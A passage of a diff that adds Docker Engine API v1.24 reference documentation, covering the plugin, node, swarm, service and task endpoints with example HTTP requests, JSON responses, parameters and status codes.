"", + "Value": [ + "host" + ] + }, + { + "Name": "mount", + "Description": "", + "Value": [ + "/data" + ] + }, + { + "Name": "device", + "Description": "", + "Value": [ + "/dev/cpu_dma_latency" + ] + } +] +``` + +**Query parameters**: + +- **name** - Name of the plugin to pull. The name may include a tag or digest. + This parameter is required. + +**Status codes**: + +- **200** - no error +- **500** - error parsing reference / not a valid repository/tag: repository + name must have at least one component +- **500** - plugin already exists + +#### Inspect a plugin + +`GET /plugins/(plugin name)` + +Returns detailed information about an installed plugin. + +**Example request**: + +``` +GET /v1.24/plugins/tiborvass/no-remove:latest HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. + + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Id": "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078", + "Name": "tiborvass/no-remove", + "Tag": "latest", + "Active": false, + "Config": { + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Env": [ + "DEBUG=1" + ], + "Args": null, + "Devices": null + }, + "Manifest": { + "ManifestVersion": "v0", + "Description": "A test plugin for Docker", + "Documentation": "https://docs.docker.com/engine/extend/plugins/", + "Interface": { + "Types": [ + "docker.volumedriver/1.0" + ], + "Socket": "plugins.sock" + }, + "Entrypoint": [ + "plugin-no-remove", + "/data" + ], + "Workdir": "", + "User": { + }, + "Network": { + "Type": "host" + }, + "Capabilities": null, + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Devices": [ + { + "Name": "device", + "Description": "a host device to mount", + "Settable": null, + "Path": "/dev/cpu_dma_latency" + } + ], + "Env": [ + { + "Name": "DEBUG", + "Description": "If set, prints debug messages", + "Settable": null, + "Value": "1" + } + ], + "Args": { + "Name": "args", + "Description": "command line arguments", + "Settable": null, + "Value": [ + + ] + } + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - plugin not installed + +#### Enable a plugin + +`POST /plugins/(plugin name)/enable` + +Enables a plugin + +**Example request**: + +``` +POST /v1.24/plugins/tiborvass/no-remove:latest/enable HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. + + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Length: 0 +Content-Type: text/plain; charset=utf-8 +``` + +**Status codes**: + +- **200** - no error +- **500** - plugin is already enabled + +#### Disable a plugin + +`POST /plugins/(plugin name)/disable` + +Disables a plugin + +**Example request**: + +``` +POST /v1.24/plugins/tiborvass/no-remove:latest/disable HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. + + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Length: 0 +Content-Type: text/plain; charset=utf-8 +``` + +**Status codes**: + +- **200** - no error +- **500** - plugin is already disabled + +#### Remove a plugin + +`DELETE /plugins/(plugin name)` + +Removes a plugin + +**Example request**: + +``` +DELETE /v1.24/plugins/tiborvass/no-remove:latest HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Length: 0 +Content-Type: text/plain; charset=utf-8 +``` + +**Status codes**: + +- **200** - no error +- **404** - plugin not installed +- **500** - plugin is active + + + +### 3.7 Nodes + +**Note**: Node operations require the engine to be part of a swarm. + +#### List nodes + + +`GET /nodes` + +List nodes + +**Example request**: + + GET /v1.24/nodes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "ID": "24ifsmvkjbyhk", + "Version": { + "Index": 8 + }, + "CreatedAt": "2016-06-07T20:31:11.853781916Z", + "UpdatedAt": "2016-06-07T20:31:11.999868824Z", + "Spec": { + "Name": "my-node", + "Role": "manager", + "Availability": "active" + "Labels": { + "foo": "bar" + } + }, + "Description": { + "Hostname": "bf3067039e47", + "Platform": { + "Architecture": "x86_64", + "OS": "linux" + }, + "Resources": { + "NanoCPUs": 4000000000, + "MemoryBytes": 8272408576 + }, + "Engine": { + "EngineVersion": "1.12.0", + "Labels": { + "foo": "bar", + } + "Plugins": [ + { + "Type": "Volume", + "Name": "local" + }, + { + "Type": "Network", + "Name": "bridge" + } + { + "Type": "Network", + "Name": "null" + } + { + "Type": "Network", + "Name": "overlay" + } + ] + } + }, + "Status": { + "State": "ready" + }, + "ManagerStatus": { + "Leader": true, + "Reachability": "reachable", + "Addr": "172.17.0.2:2377"" + } + } + ] + +**Query parameters**: + +- **filters** – a JSON encoded value of the filters (a `map[string][]string`) to process on the + nodes list. Available filters: + - `id=` + - `label=` + - `membership=`(`accepted`|`pending`)` + - `name=` + - `role=`(`manager`|`worker`)` + +**Status codes**: + +- **200** – no error +- **406** - node is not part of a swarm +- **500** – server error + +#### Inspect a node + + +`GET /nodes/(id or name)` + +Return low-level information on the node `id` + +**Example request**: + + GET /v1.24/nodes/24ifsmvkjbyhk HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "ID": "24ifsmvkjbyhk", + "Version": { + "Index": 8 + }, + "CreatedAt": "2016-06-07T20:31:11.853781916Z", + "UpdatedAt": "2016-06-07T20:31:11.999868824Z", + "Spec": { + "Name": "my-node", + "Role": "manager", + "Availability": "active" + "Labels": { + "foo": "bar" + } + }, + "Description": { + "Hostname": "bf3067039e47", + "Platform": { + "Architecture": "x86_64", + "OS": "linux" + }, + "Resources": { + "NanoCPUs": 4000000000, + "MemoryBytes": 8272408576 + }, + "Engine": { + "EngineVersion": "1.12.0", + "Labels": { + "foo": "bar", + } + "Plugins": [ + { + "Type": "Volume", + "Name": "local" + }, + { + "Type": "Network", + "Name": "bridge" + } + { + "Type": "Network", + "Name": "null" + } + { + "Type": "Network", + "Name": "overlay" + } + ] + } + }, + "Status": { + "State": "ready" + }, + "ManagerStatus": { + "Leader": true, + "Reachability": "reachable", + "Addr": "172.17.0.2:2377"" + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such node +- **406** – node is not part of a swarm +- **500** – server error + +#### Remove a node + + +`DELETE /nodes/(id or name)` + +Remove a node from the swarm. + +**Example request**: + + DELETE /v1.24/nodes/24ifsmvkjbyhk HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **force** - 1/True/true or 0/False/false, Force remove a node from the swarm. + Default `false`. + +**Status codes**: + +- **200** – no error +- **404** – no such node +- **406** – node is not part of a swarm +- **500** – server error + +#### Update a node + + +`POST /nodes/(id)/update` + +Update a node. + +The payload of the `POST` request is the new `NodeSpec` and +overrides the current `NodeSpec` for the specified node. + +If `Availability` or `Role` are omitted, this returns an +error. Any other field omitted resets the current value to either +an empty value or the default cluster-wide value. + +**Example Request** + + POST /v1.24/nodes/24ifsmvkjbyhk/update?version=8 HTTP/1.1 + Content-Type: application/json + + { + "Availability": "active", + "Name": "node-name", + "Role": "manager", + "Labels": { + "foo": "bar" + } + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **version** – The version number of the node object being updated. This is + required to avoid conflicting writes. + +JSON Parameters: + +- **Annotations** – Optional medata to associate with the node. + - **Name** – User-defined name for the node. + - **Labels** – A map of labels to associate with the node (e.g., + `{"key":"value", "key2":"value2"}`). +- **Role** - Role of the node (worker/manager). +- **Availability** - Availability of the node (active/pause/drain). + + +**Status codes**: + +- **200** – no error +- **404** – no such node +- **406** – node is not part of a swarm +- **500** – server error + +### 3.8 Swarm + +#### Inspect swarm + + +`GET /swarm` + +Inspect swarm + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "CreatedAt" : "2016-08-15T16:00:20.349727406Z", + "Spec" : { + "Dispatcher" : { + "HeartbeatPeriod" : 5000000000 + }, + "Orchestration" : { + "TaskHistoryRetentionLimit" : 10 + }, + "CAConfig" : { + "NodeCertExpiry" : 7776000000000000 + }, + "Raft" : { + "LogEntriesForSlowFollowers" : 500, + "HeartbeatTick" : 1, + "SnapshotInterval" : 10000, + "ElectionTick" : 3 + }, + "TaskDefaults" : {}, + "Name" : "default" + }, + "JoinTokens" : { + "Worker" : "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-6qmn92w6bu3jdvnglku58u11a", + "Manager" : "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-8llk83c4wm9lwioey2s316r9l" + }, + "ID" : "70ilmkj2f6sp2137c753w2nmt", + "UpdatedAt" : "2016-08-15T16:32:09.623207604Z", + "Version" : { + "Index" : 51 + } + } + +**Status codes**: + +- **200** - no error +- **406** – node is not part of a swarm +- **500** - sever error + +#### Initialize a new swarm + + +`POST /swarm/init` + +Initialize a new swarm. The body of the HTTP response includes the node ID. + +**Example request**: + + POST /v1.24/swarm/init HTTP/1.1 + Content-Type: application/json + + { + "ListenAddr": "0.0.0.0:2377", + "AdvertiseAddr": "192.168.1.1:2377", + "ForceNewCluster": false, + "Spec": { + "Orchestration": {}, + "Raft": {}, + "Dispatcher": {}, + "CAConfig": {} + } + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 28 + Content-Type: application/json + Date: Thu, 01 Sep 2016 21:49:13 GMT + Server: Docker/1.12.0 (linux) + + "7v2t30z9blmxuhnyo6s4cpenp" + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **406** – node is already part of a swarm +- **500** - server error + +JSON Parameters: + +- **ListenAddr** – Listen address used for inter-manager communication, as well as determining + the networking interface used for the VXLAN Tunnel Endpoint (VTEP). This can either be an + address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port + number, like `eth0:4567`. If the port number is omitted, the default swarm listening port is + used. +- **AdvertiseAddr** – Externally reachable address advertised to other nodes. This can either be + an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port + number, like `eth0:4567`. If the port number is omitted, the port number from the listen + address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when + possible. +- **ForceNewCluster** – Force creation of a new swarm. +- **Spec** – Configuration settings for the new swarm. + - **Orchestration** – Configuration settings for the orchestration aspects of the swarm. + - **TaskHistoryRetentionLimit** – Maximum number of tasks history stored. + - **Raft** – Raft related configuration. + - **SnapshotInterval** – Number of logs entries between snapshot. + - **KeepOldSnapshots** – Number of snapshots to keep beyond the current snapshot. + - **LogEntriesForSlowFollowers** – Number of log entries to keep around to sync up slow + followers after a snapshot is created. + - **HeartbeatTick** – Amount of ticks (in seconds) between each heartbeat. + - **ElectionTick** – Amount of ticks (in seconds) needed without a leader to trigger a new + election. + - **Dispatcher** – Configuration settings for the task dispatcher. + - **HeartbeatPeriod** – The delay for an agent to send a heartbeat to the dispatcher. + - **CAConfig** – Certificate authority configuration. + - **NodeCertExpiry** – Automatic expiry for nodes certificates. + - **ExternalCA** - Configuration for forwarding signing requests to an external + certificate authority. + - **Protocol** - Protocol for communication with the external CA + (currently only "cfssl" is supported). + - **URL** - URL where certificate signing requests should be sent. + - **Options** - An object with key/value pairs that are interpreted + as protocol-specific options for the external CA driver. + +#### Join an existing swarm + +`POST /swarm/join` + +Join an existing swarm + +**Example request**: + + POST /v1.24/swarm/join HTTP/1.1 + Content-Type: application/json + + { + "ListenAddr": "0.0.0.0:2377", + "AdvertiseAddr": "192.168.1.1:2377", + "RemoteAddrs": ["node1:2377"], + "JoinToken": "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **406** – node is already part of a swarm +- **500** - server error + +JSON Parameters: + +- **ListenAddr** – Listen address used for inter-manager communication if the node gets promoted to + manager, as well as determining the networking interface used for the VXLAN Tunnel Endpoint (VTEP). +- **AdvertiseAddr** – Externally reachable address advertised to other nodes. This can either be + an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port + number, like `eth0:4567`. If the port number is omitted, the port number from the listen + address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when + possible. +- **RemoteAddr** – Address of any manager node already participating in the swarm. +- **JoinToken** – Secret token for joining this swarm. + +#### Leave a swarm + + +`POST /swarm/leave` + +Leave a swarm + +**Example request**: + + POST /v1.24/swarm/leave HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **force** - Boolean (0/1, false/true). Force leave swarm, even if this is the last manager or that it will break the cluster. + +**Status codes**: + +- **200** – no error +- **406** – node is not part of a swarm +- **500** - server error + +#### Update a swarm + + +`POST /swarm/update` + +Update a swarm + +**Example request**: + + POST /v1.24/swarm/update HTTP/1.1 + + { + "Name": "default", + "Orchestration": { + "TaskHistoryRetentionLimit": 10 + }, + "Raft": { + "SnapshotInterval": 10000, + "LogEntriesForSlowFollowers": 500, + "HeartbeatTick": 1, + "ElectionTick": 3 + }, + "Dispatcher": { + "HeartbeatPeriod": 5000000000 + }, + "CAConfig": { + "NodeCertExpiry": 7776000000000000 + }, + "JoinTokens": { + "Worker": "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx", + "Manager": "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2" + } + } + + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **version** – The version number of the swarm object being updated. This is + required to avoid conflicting writes. +- **rotateWorkerToken** - Set to `true` (or `1`) to rotate the worker join token. +- **rotateManagerToken** - Set to `true` (or `1`) to rotate the manager join token. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **406** – node is not part of a swarm +- **500** - server error + +JSON Parameters: + +- **Orchestration** – Configuration settings for the orchestration aspects of the swarm. + - **TaskHistoryRetentionLimit** – Maximum number of tasks history stored. +- **Raft** – Raft related configuration. + - **SnapshotInterval** – Number of logs entries between snapshot. + - **KeepOldSnapshots** – Number of snapshots to keep beyond the current snapshot. + - **LogEntriesForSlowFollowers** – Number of log entries to keep around to sync up slow + followers after a snapshot is created. + - **HeartbeatTick** – Amount of ticks (in seconds) between each heartbeat. + - **ElectionTick** – Amount of ticks (in seconds) needed without a leader to trigger a new + election. +- **Dispatcher** – Configuration settings for the task dispatcher. + - **HeartbeatPeriod** – The delay for an agent to send a heartbeat to the dispatcher. +- **CAConfig** – CA configuration. + - **NodeCertExpiry** – Automatic expiry for nodes certificates. + - **ExternalCA** - Configuration for forwarding signing requests to an external + certificate authority. + - **Protocol** - Protocol for communication with the external CA + (currently only "cfssl" is supported). + - **URL** - URL where certificate signing requests should be sent. + - **Options** - An object with key/value pairs that are interpreted + as protocol-specific options for the external CA driver. +- **JoinTokens** - Tokens that can be used by other nodes to join the swarm. + - **Worker** - Token to use for joining as a worker. + - **Manager** - Token to use for joining as a manager. + +### 3.9 Services + +**Note**: Service operations require to first be part of a swarm. + +#### List services + + +`GET /services` + +List services + +**Example request**: + + GET /v1.24/services HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "ID": "9mnpnzenvg8p8tdbtq4wvbkcz", + "Version": { + "Index": 19 + }, + "CreatedAt": "2016-06-07T21:05:51.880065305Z", + "UpdatedAt": "2016-06-07T21:07:29.962229872Z", + "Spec": { + "Name": "hopeful_cori", + "TaskTemplate": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": { + "Constraints": [ + "node.role == worker" + ] + } + }, + "Mode": { + "Replicated": { + "Replicas": 1 + } + }, + "UpdateConfig": { + "Parallelism": 1, + "FailureAction": "pause" + }, + "EndpointSpec": { + "Mode": "vip", + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ] + } + }, + "Endpoint": { + "Spec": { + "Mode": "vip", + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ] + }, + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ], + "VirtualIPs": [ + { + "NetworkID": "4qvuz4ko70xaltuqbt8956gd1", + "Addr": "10.255.0.2/16" + }, + { + "NetworkID": "4qvuz4ko70xaltuqbt8956gd1", + "Addr": "10.255.0.3/16" + } + ] + } + } + ] + +**Query parameters**: + +- **filters** – a JSON encoded value of the filters (a `map[string][]string`) to process on the + services list. Available filters: + - `id=` + - `label=` + - `name=` + +**Status codes**: + +- **200** – no error +- **406** – node is not part of a swarm +- **500** – server error + +#### Create a service + +`POST /services/create` + +Create a service. When using this endpoint to create a service using a private +repository from the registry, the `X-Registry-Auth` header must be used to +include a base64-encoded AuthConfig object. Refer to the [create an +image](#create-an-image) section for more details. + +**Example request**: + + POST /v1.24/services/create HTTP/1.1 + Content-Type: application/json + + { + "Name": "web", + "TaskTemplate": { + "ContainerSpec": { + "Image": "nginx:alpine", + "Mounts": [ + { + "ReadOnly": true, + "Source": "web-data", + "Target": "/usr/share/nginx/html", + "Type": "volume", + "VolumeOptions": { + "DriverConfig": { + }, + "Labels": { + "com.example.something": "something-value" + } + } + } + ], + "User": "33" + }, + "Networks": [ + { + "Target": "overlay1" + } + ], + "LogDriver": { + "Name": "json-file", + "Options": { + "max-file": "3", + "max-size": "10M" + } + }, + "Placement": { + "Constraints": [ + "node.role == worker" + ] + }, + "Resources": { + "Limits": { + "MemoryBytes": 104857600 + }, + "Reservations": { + } + }, + "RestartPolicy": { + "Condition": "on-failure", + "Delay": 10000000000, + "MaxAttempts": 10 + } + }, + "Mode": { + "Replicated": { + "Replicas": 4 + } + }, + "UpdateConfig": { + "Delay": 30000000000, + "Parallelism": 2, + "FailureAction": "pause" + }, + "EndpointSpec": { + "Ports": [ + { + "Protocol": "tcp", + "PublishedPort": 8080, + "TargetPort": 80 + } + ] + }, + "Labels": { + "foo": "bar" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "ID":"ak7w3gjqoa3kuz8xcpnyy0pvl" + } + +**Status codes**: + +- **201** – no error +- **403** - network is not eligible for services +- **406** – node is not part of a swarm +- **409** – name conflicts with an existing object +- **500** - server error + +**JSON Parameters**: + +- **Name** – User-defined name for the service. +- **Labels** – A map of labels to associate with the service (e.g., `{"key":"value", "key2":"value2"}`). +- **TaskTemplate** – Specification of the tasks to start as part of the new service. + - **ContainerSpec** - Container settings for containers started as part of this task. + - **Image** – A string specifying the image name to use for the container. + - **Command** – The command to be run in the image. + - **Args** – Arguments to the command. + - **Env** – A list of environment variables in the form of `["VAR=value"[,"VAR2=value2"]]`. + - **Dir** – A string specifying the working directory for commands to run in. + - **User** – A string value specifying the user inside the container. + - **Labels** – A map of labels to associate with the service (e.g., + `{"key":"value", "key2":"value2"}`). + - **Mounts** – Specification for mounts to be added to containers + created as part of the service. + - **Target** – Container path. + - **Source** – Mount source (e.g. a volume name, a host path). + - **Type** – The mount type (`bind`, or `volume`). + - **ReadOnly** – A boolean indicating whether the mount should be read-only. + - **BindOptions** - Optional configuration for the `bind` type. + - **Propagation** – A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`. + - **VolumeOptions** – Optional configuration for the `volume` type. + - **NoCopy** – A boolean indicating if volume should be + populated with the data from the target. (Default false) + - **Labels** – User-defined name and labels for the volume. + - **DriverConfig** – Map of driver-specific options. + - **Name** - Name of the driver to use to create the volume. + - **Options** - key/value map of driver specific options. + - **StopGracePeriod** – Amount of time to wait for the container to terminate before + forcefully killing it. + - **LogDriver** - Log configuration for containers created as part of the + service. + - **Name** - Name of the logging driver to use (`json-file`, `syslog`, + `journald`, `gelf`, `fluentd`, `awslogs`, `splunk`, `etwlogs`, `none`). + - **Options** - Driver-specific options. + - **Resources** – Resource requirements which apply to each individual container created as part + of the service. + - **Limits** – Define resources limits. + - **NanoCPUs** – CPU limit in units of 10-9 CPU shares. + - **MemoryBytes** – Memory limit in Bytes. + - **Reservation** – Define resources reservation. + - **NanoCPUs** – CPU reservation in units of 10-9 CPU shares. + - **MemoryBytes** – Memory reservation in Bytes. + - **RestartPolicy** – Specification for the restart policy which applies to containers created + as part of this service. + - **Condition** – Condition for restart (`none`, `on-failure`, or `any`). + - **Delay** – Delay between restart attempts. + - **Attempts** – Maximum attempts to restart a given container before giving up (default value + is 0, which is ignored). + - **Window** – Windows is the time window used to evaluate the restart policy (default value is + 0, which is unbounded). + - **Placement** – Restrictions on where a service can run. + - **Constraints** – An array of constraints, e.g. `[ "node.role == manager" ]`. +- **Mode** – Scheduling mode for the service (`replicated` or `global`, defaults to `replicated`). +- **UpdateConfig** – Specification for the update strategy of the service. + - **Parallelism** – Maximum number of tasks to be updated in one iteration (0 means unlimited + parallelism). + - **Delay** – Amount of time between updates. + - **FailureAction** - Action to take if an updated task fails to run, or stops running during the + update. Values are `continue` and `pause`. +- **Networks** – Array of network names or IDs to attach the service to. +- **EndpointSpec** – Properties that can be configured to access and load balance a service. + - **Mode** – The mode of resolution to use for internal load balancing + between tasks (`vip` or `dnsrr`). Defaults to `vip` if not provided. + - **Ports** – List of exposed ports that this service is accessible on from + the outside, in the form of: + `{"Protocol": <"tcp"|"udp">, "PublishedPort": , "TargetPort": }`. + Ports can only be provided if `vip` resolution mode is used. + +**Request Headers**: + +- **Content-type** – Set to `"application/json"`. +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either + login information, or a token. Refer to the [create an image](#create-an-image) + section for more details. + + +#### Remove a service + + +`DELETE /services/(id or name)` + +Stop and remove the service `id` + +**Example request**: + + DELETE /v1.24/services/16253994b7c4 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Status codes**: + +- **200** – no error +- **404** – no such service +- **406** - node is not part of a swarm +- **500** – server error + +#### Inspect one or more services + + +`GET /services/(id or name)` + +Return information on the service `id`. + +**Example request**: + + GET /v1.24/services/1cb4dnqcyx6m66g2t538x3rxha HTTP/1.1 + +**Example response**: + + { + "ID": "ak7w3gjqoa3kuz8xcpnyy0pvl", + "Version": { + "Index": 95 + }, + "CreatedAt": "2016-06-07T21:10:20.269723157Z", + "UpdatedAt": "2016-06-07T21:10:20.276301259Z", + "Spec": { + "Name": "redis", + "TaskTemplate": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "Mode": { + "Replicated": { + "Replicas": 1 + } + }, + "UpdateConfig": { + "Parallelism": 1, + "FailureAction": "pause" + }, + "EndpointSpec": { + "Mode": "vip", + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ] + } + }, + "Endpoint": { + "Spec": { + "Mode": "vip", + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ] + }, + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ], + "VirtualIPs": [ + { + "NetworkID": "4qvuz4ko70xaltuqbt8956gd1", + "Addr": "10.255.0.4/16" + } + ] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such service +- **406** - node is not part of a swarm +- **500** – server error + +#### Update a service + +`POST /services/(id or name)/update` + +Update a service. When using this endpoint to create a service using a +private repository from the registry, the `X-Registry-Auth` header can be used +to update the authentication information for that is stored for the service. +The header contains a base64-encoded AuthConfig object. Refer to the [create an +image](#create-an-image) section for more details. + +**Example request**: + + POST /v1.24/services/1cb4dnqcyx6m66g2t538x3rxha/update?version=23 HTTP/1.1 + Content-Type: application/json + + { + "Name": "top", + "TaskTemplate": { + "ContainerSpec": { + "Image": "busybox", + "Args": [ + "top" + ] + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "Mode": { + "Replicated": { + "Replicas": 1 + } + }, + "UpdateConfig": { + "Parallelism": 1 + }, + "EndpointSpec": { + "Mode": "vip" + } + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**JSON Parameters**: + +- **Name** – User-defined name for the service. Note that renaming services is not supported. +- **Labels** – A map of labels to associate with the service (e.g., `{"key":"value", "key2":"value2"}`). +- **TaskTemplate** – Specification of the tasks to start as part of the new service. + - **ContainerSpec** - Container settings for containers started as part of this task. + - **Image** – A string specifying the image name to use for the container. + - **Command** – The command to be run in the image. + - **Args** – Arguments to the command. + - **Env** – A list of environment variables in the form of `["VAR=value"[,"VAR2=value2"]]`. + - **Dir** – A string specifying the working directory for commands to run in. + - **User** – A string value specifying the user inside the container. + - **Labels** – A map of labels to associate with the service (e.g., + `{"key":"value", "key2":"value2"}`). + - **Mounts** – Specification for mounts to be added to containers created as part of the new + service. + - **Target** – Container path. + - **Source** – Mount source (e.g. a volume name, a host path). + - **Type** – The mount type (`bind`, or `volume`). + - **ReadOnly** – A boolean indicating whether the mount should be read-only. + - **BindOptions** - Optional configuration for the `bind` type + - **Propagation** – A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`. + - **VolumeOptions** – Optional configuration for the `volume` type. + - **NoCopy** – A boolean indicating if volume should be + populated with the data from the target. (Default false) + - **Labels** – User-defined name and labels for the volume. + - **DriverConfig** – Map of driver-specific options. + - **Name** - Name of the driver to use to create the volume + - **Options** - key/value map of driver specific options + - **StopGracePeriod** – Amount of time to wait for the container to terminate before + forcefully killing it. + - **Resources** – Resource requirements which apply to each individual container created as part + of the service. + - **Limits** – Define resources limits. + - **CPU** – CPU limit + - **Memory** – Memory limit + - **Reservation** – Define resources reservation. + - **CPU** – CPU reservation + - **Memory** – Memory reservation + - **RestartPolicy** – Specification for the restart policy which applies to containers created + as part of this service. + - **Condition** – Condition for restart (`none`, `on-failure`, or `any`). + - **Delay** – Delay between restart attempts. + - **MaxAttempts** – Maximum attempts to restart a given container before giving up (default value + is 0, which is ignored). + - **Window** – Windows is the time window used to evaluate the restart policy (default value is + 0, which is unbounded). + - **Placement** – Restrictions on where a service can run. + - **Constraints** – An array of constraints, e.g. `[ "node.role == manager" ]`. +- **Mode** – Scheduling mode for the service (`replicated` or `global`, defaults to `replicated`). +- **UpdateConfig** – Specification for the update strategy of the service. + - **Parallelism** – Maximum number of tasks to be updated in one iteration (0 means unlimited + parallelism). + - **Delay** – Amount of time between updates. +- **Networks** – Array of network names or IDs to attach the service to. +- **EndpointSpec** – Properties that can be configured to access and load balance a service. + - **Mode** – The mode of resolution to use for internal load balancing + between tasks (`vip` or `dnsrr`). Defaults to `vip` if not provided. + - **Ports** – List of exposed ports that this service is accessible on from + the outside, in the form of: + `{"Protocol": <"tcp"|"udp">, "PublishedPort": , "TargetPort": }`. + Ports can only be provided if `vip` resolution mode is used. + +**Query parameters**: + +- **version** – The version number of the service object being updated. This is + required to avoid conflicting writes. + +**Request Headers**: + +- **Content-type** – Set to `"application/json"`. +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either + login information, or a token. Refer to the [create an image](#create-an-image) + section for more details. + +**Status codes**: + +- **200** – no error +- **404** – no such service +- **406** - node is not part of a swarm +- **500** – server error + +### 3.10 Tasks + +**Note**: Task operations require the engine to be part of a swarm. + +#### List tasks + + +`GET /tasks` + +List tasks + +**Example request**: + + GET /v1.24/tasks HTTP/1.1 + +**Example response**: + + [ + { + "ID": "0kzzo1i0y4jz6027t0k7aezc7", + "Version": { + "Index": 71 + }, + "CreatedAt": "2016-06-07T21:07:31.171892745Z", + "UpdatedAt": "2016-06-07T21:07:31.376370513Z", + "Spec": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "ServiceID": "9mnpnzenvg8p8tdbtq4wvbkcz", + "Slot": 1, + "NodeID": "60gvrl6tm78dmak4yl7srz94v", + "Status": { + "Timestamp": "2016-06-07T21:07:31.290032978Z", + "State": "running", + "Message": "started", + "ContainerStatus": { + "ContainerID": "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035", + "PID": 677 + } + }, + "DesiredState": "running", + "NetworksAttachments": [ + { + "Network": { + "ID": "4qvuz4ko70xaltuqbt8956gd1", + "Version": { + "Index": 18 + }, + "CreatedAt": "2016-06-07T20:31:11.912919752Z", + "UpdatedAt": "2016-06-07T21:07:29.955277358Z", + "Spec": { + "Name": "ingress", + "Labels": { + "com.docker.swarm.internal": "true" + }, + "DriverConfiguration": {}, + "IPAMOptions": { + "Driver": {}, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "DriverState": { + "Name": "overlay", + "Options": { + "com.docker.network.driver.overlay.vxlanid_list": "256" + } + }, + "IPAMOptions": { + "Driver": { + "Name": "default" + }, + "Configs": [ + { + 